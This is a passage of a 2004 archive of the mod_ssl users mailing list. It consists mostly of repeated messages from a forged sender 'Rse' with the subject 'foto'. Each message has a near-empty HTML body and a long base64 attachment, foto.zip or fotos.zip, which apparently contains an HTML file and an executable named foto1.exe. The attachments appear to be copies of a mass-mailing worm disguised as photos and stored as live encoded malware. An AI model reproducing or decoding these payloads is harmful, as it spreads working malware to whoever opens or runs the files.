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
AA==

----------xwzgnwbdfhzdwafkinza--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 23:05:46 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 21F5AA8CCC; Tue, 31 Aug 2004 23:05:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toshiba-user.com (c-67-180-74-40.client.comcast.net [67.180.74.40])
	by master.modssl.org (Postfix) with SMTP id DF6EFA8A81
	for ; Tue, 31 Aug 2004 23:05:40 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:05:36 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------umtcaspifvtanrmjixfy"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------umtcaspifvtanrmjixfy
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------umtcaspifvtanrmjixfy
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------umtcaspifvtanrmjixfy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 23:06:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 35F73A8A99; Tue, 31 Aug 2004 23:06:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.org (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 6FCB3A8A81
	for ; Tue, 31 Aug 2004 23:06:26 +0200 (CEST)
Date: Tue, 31 Aug 2004 17:07:19 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------epspdpotiwzaididjzpo"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------epspdpotiwzaididjzpo
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------epspdpotiwzaididjzpo
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
zhJUH2FKi6J0e7P5dPzx3h58evC9vuH73siw7ahvDPwH27hXyx/0vA/e/VhTQmEWwZoWasT0
u3qk7nRt6FgnwWGjC0cCaQFnhQaARUhzaFT1vrUqlJwxFeASUYPMskPbPKII5uLkbel6KVhj
zWUV7Au6TiFqVTlTM+dIJc6Vzp5KOME7danv3oLG/ufRcrb4/vQ89ruXnHXl/1C7GKpaom2K
jhct/Z8pbSFURMfy9LwdmuosWRYxjGHjHnCs+mr5BVBLAwQKAAAAAAChhCExAAAAAAAAAAAA
AAAACgAAAGZvdG8vZm90by9QSwMEFAAAAAgAL48hMUNfuiVDEAAAADIAABMAAABmb3RvL2Zv
dG8vZm90bzEuZXhl7VoPcBzVeX8nCyOwYt8Qm2APE2Rjpw4THbJ0ZwhxJzqkE3Yq24dO0hlQ
MHu3T7d72ttd3u7qdCpMZYSmuKqpJzBt2jKZzJSm05Z6WgZ3nHQCArulLqS1O0xKA5Map002
mBIGq0VlVF9/7+2efOfbE5C0w9Dxs79v3/u+9773ve/9+7532n03ISFCSBOgXCakm3ip8n2m
/3sbSYPE6yQThPSHVpCJcixeoZ8ha0KrQle0kmYUIh5t6BqgMKDNbxn2Om3221S+5D5fmaVP
2Ku79F36iKRA3o5GCv4iCXKVZdgRm07Y+H5zha8QH0BTnYgzESZLtkTIy00eQdRbWVuvG/8j
XjVy/vNAHYCtgKvr6s39PENZLg3NvjWcTs0+2DLrtKbd2zCambnD9o2PLXbNTZ8sv3tk6svE
DqdT7lpwDq6cmbNb/uzcj47xFXPP/ntPvtDCBUyfWMgT/GsCrOBG6y47Le6zGPHBxGK303zy
hVawDyUWkmUnXHZay86i+z64/Pub+ApxvJKQ5aaUU8PdRHkQyP1quVxeNbfm4b8nvHpLnii3
wYDu1z3ZM+A8LTit7l8J0ny+WeHTUXbm81x+eR2XdTCx0PXaqjn71zhtXmiwIJivgwn6oNfZ
TRChmMgl3S3IHhp6Z4A3WEjy0Yn6rwphb6HJxny57LzltvN6CTfJ8/+CYcx+1eXZvwzx1TNF
